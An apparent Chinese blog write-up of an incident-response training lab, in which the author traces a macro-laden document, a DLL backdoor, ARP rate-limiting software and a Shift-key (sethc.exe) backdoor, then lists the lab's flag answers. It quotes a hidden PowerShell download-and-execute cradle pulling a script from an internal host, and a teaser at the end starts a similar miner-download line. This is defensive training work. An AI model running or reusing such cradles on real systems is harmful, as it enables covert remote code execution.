应急响应靶机训练 - 近源 OS1
应急响应靶机训练 - 近源 OS1
小王从某安全大厂被优化掉后,来到了某私立小学当起了计算机老师。某一天上课的时候,发现鼠标在自己动弹,又发现除了某台电脑,其他电脑连不上网络。感觉肯定有学生捣乱,于是开启了应急。
请你找出以下内容作为通关条件:
- 攻击者的外网 IP 地址;
- 攻击者的内网跳板 IP 地址;
- 攻击者使用的限速软件的 MD5 大写;
- 攻击者的后门 MD5 大写;
- 攻击者留下的 flag;
该靶机有很多非预期解,做靶机是给自己做,请大家合理按照预期解进行探索。相关账户密码:
Administrator/zgsf@2024
1 流程梳理
[!Note]
这里推荐使用 RDP 远程连接服务器,因为 近源 OS1 靶机没有安装 VMTools,操作不是很方便。
这次的靶机有点奇怪,我看 WP 理不出思路,不过有个取巧、简便的方法。
下个火绒!,直接开扫:
可以发现在 “学校放假通知 - 练习.doc” 里面有个宏病毒,直接扔到微步云沙箱里分析一下:
发现了攻击者的 VPS(可能)地址 8.219.200.130:
再往下,分析说 php_xmlrpc.dll 是一个后门漏洞,这我可太熟悉了,分析文章都写过:
直接打开文件搜:
像看攻击者的行为,但是没日志:
再往下看,发现存在一个 test.bat 说是下载者木马,由于隐藏起来了,记得解除一下:
里头就写了一句话,用于去 192.168.20.129 下载脚本:
1 | powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.20.129:801/a'))" |
剩下的内容我就没发现了,按照 WP 理一下。
限速软件,说是 ARP 劫持。那就是将网关改成攻击者地址,再进行限速。
那用的啥软件呢?在 C 盘可以看到 “P2P 终结者”:
1 | C:\PerfLogs\666\666\777\666\666\666\666\666\666\666\666\666\666\666 |
最后一个后门,我也没想到是 Shift 后门(火绒居然扫不到,看来要换 360 了),验证一下:
shift 后门位置:
1 | C:\Windows\System32\sethc.exe |
也扔到微步上,在微步的运行截图里也可以看到 flag:
2 总结
讲道理,这个攻击流程有点乱,根据猜测可能是:学生 U 盘拷了个 doc 文件 -> 老师点击触发宏 -> 主机上线 -> 攻击者创建后门。
Flag 如下:
- 攻击者的外网 IP 地址:8.219.200.130
- 攻击者的内网跳板 IP 地址:192.168.20.129
- 攻击者使用的限速软件的 MD5 大写:2A5D8838BDB4D404EC632318C94ADC96
- 攻击者的后门程序的 MD5 大写:58A3FF82A1AFF927809C529EB1385DA1
- 攻击者留下的 flag:flag {zgsf@shift666}
3 彩蛋
偷偷用 360 试试:
卧槽,有了!
相关推荐
2025-12-19
应急响应靶机训练 - Web1
应急响应靶机训练 - Web1小李在值守的过程中,发现有 CPU 占用飙升,出于胆子小,就立刻将服务器关机,并找来正在吃苕皮的 hxd 帮他分析,这是他的服务器系统,请你找出以下内容,并作为通关条件: 攻击者的 Shell 密码; 攻击者的 IP 地址; 攻击者的隐藏账户名称; 攻击者挖矿程序的矿池域名; 相关账户密码:administrator/Zgsf@admin.com 1 Flag-1由于服务器之前关过,这里需要先启动 Web 服务: 使用浏览器访问一下: 目前站点看不出入侵痕迹,根据要求可知,攻击者在站点下存在 WebShell。 打开 Web 根目录: 肉眼肯定看不出来,直接去看日志(C:\phpstudy_pro\Extensions\Apache2.4.39\logs),由于日志非常大,使用 Notepad++ 打开。经过查找发现在 2024-02-26 22:46:23 时出现了 shell.php 的访问记录: [!Warning] 这里正常说应该是看 Nginx 的,但实际是看 Apache 的。 拼接一下 shell.php 路径: 1C:...
2025-12-21
应急响应靶机训练 - Linux1
应急响应靶机训练 - Linux1小王急匆匆地找到小张,小王说 “李哥,我 dev 服务器被黑了”,快救救我!!。请你找出以下内容作为通关条件: 黑客的 IP 地址; 黑客遗留下的 3 个 flag; 该靶机有很多非预期解,做靶机是给自己做,请大家合理按照预期解进行探索。相关账户密码: defend/defend root/defend 1 流程梳理在 Linux 中最普遍的就是 SSH 登录了,可以使用 last 看看最近的用户登录情况: 123456789101112[defend@localhost ~]$ lastdefend pts/0 :0 Sun Dec 21 22:44 still logged in defend :0 :0 Sun Dec 21 22:44 still logged in reboot system boot 3.10.0-1160.el7. Sun Dec 21 22:44 - 22:44 (00:00) ...
2025-12-22
应急响应靶机训练 - Linux2
应急响应靶机训练 - Linux2看监控的时候发现 Webshell 告警,领导让你上机检查,你可以救救安服仔吗!!。 请你找出以下内容作为通关条件: 黑客的 IP 地址; 黑客修改的管理员密码(明文); 黑客留下的 WebShell 连接密码; 黑客后续上传的木马文件名称; 黑客遗留下的 3 个 flag; 该靶机有很多非预期解,做靶机是给自己做,请大家合理按照预期解进行探索。相关账户密码: root/Inch@957821. 1 流程梳理 [!Note] 这里推荐使用 SSH 远程连接服务器,因为 Linux2 靶机没有 GUI 界面,操作不是很方便。 在 Linux 中最普遍的就是 SSH 登录了,可以使用 last 看看最近的用户登录情况: 可以看到 192.168.20.1 在 2024-03-20 有个连接,看看登录失败的记录: 翻一翻 secure 日志: 1cat /var/log/secure | grep '192.168.20.1' 不够这点信息也不能确定是否是攻击者,查看 root 的历史命令: 12345678910111213141...
2025-12-20
应急响应靶机训练 - Web2
应急响应靶机训练 - Web2小李在某单位驻场值守,深夜 12 点,甲方已经回家了,小李刚偷偷摸鱼后,发现安全设备有告警,于是立刻停掉了机器开始排查。这是他的服务器系统,请你找出以下内容,并作为通关条件: 攻击者的 IP 地址(两个); 攻击者的 Webshell 文件名; 攻击者的 Webshell 密码; 攻击者的伪 QQ 号; 攻击者的伪服务器 IP 地址; 攻击者的服务器端口; 攻击者的隐藏用户名; 攻击者是如何入侵的; 相关账户密码:administrator/Zgsf@qq.com 1 日志分析由于服务器之前关过,这里需要先启动 Web 服务,使用浏览器访问 Web 页面: 一眼 WordPress,看页面正常,直接去看日志文件,使用 Notepad++ 打开(C:\phpstudy_pro\Extensions\Apache2.4.39\logs\access.log.1709164800): 经查看 192.168.126.135 在 2024-02-29 12:35:10 访问了站点,在 2024-02-29 12:38:30 进行了目录扫描操作。 接着...
2025-12-24
应急响应靶机训练 - 挖矿
应急响应靶机训练 - 挖矿机房运维小陈,下班后发现还有工作没完成,然后上机器越用越卡,请你帮他看看原因。 请你找出以下内容作为通关条件: 攻击者的 IP 地址; 攻击者开始攻击的时间; 攻击者攻击的端口; 挖矿程序的 MD5; 后门脚本的 MD5; 矿池的 URL; 钱包的 URL; 攻击者入侵流程; 相关账户密码: Administrator/zgsf@123 1 流程梳理 [!Note] 这里推荐使用 RDP 远程连接服务器,因为 近源 OS1 靶机没有安装 VMTools,操作不是很方便。 根据题意说是被挖矿了,那难免会出现异常进程、CPU 占用过高的情况,打开任务管理器看看: 发现个 XMRig miner 的程序(这里是开机没有,我自己启动的,所以占用小),没见过,感觉挺特殊。 用火绒剑跟一下,看着好像挺正常的: 用火绒剑看看启动项,发现个 system.bat 脚本,那这就不正常了: 跟过去打开看看: 哦豁,确实是个恶意脚本,大致就是去矿池下载挖矿程序了: 1powershell -Command "$wc = New-Object System.N...
2025-12-21
应急响应靶机训练 - Web3
应急响应靶机训练 - Web3小苕在省护值守中,在灵机一动情况下把设备停掉了,甲方问:为什么要停设备?小苕说:我第六感告诉我,这机器可能被黑了。请你找出以下内容作为通关条件: 攻击者的两个 IP 地址; 隐藏用户名称;hack6618$ 黑客遗留下的 3 个 flag; 本虚拟机的考点不在隐藏用户以及 IP 地址,相关账户密码:administrator/xj@123456 1 日志分析由于服务器之前关过,这里需要先启动 Web 服务,使用浏览器访问 Web 页面: 根据页面提示这是个 Z-Blog 建站,看页面正常,直接去看日志文件,使用 Notepad++ 打开(D:\phpstudy_pro\Extensions\Apache2.4.39\logs\access.log.1710201600): 根据日志内容发现,攻击者 192.168.75 在 2025.03.12 11:06:58 访问站点,之后访问了 /zb_system/login.php 页面。在网页中打开,发现是后台登录页面: 接着往下看,发现频繁出现 /zb_system/cmd.php?act=v...
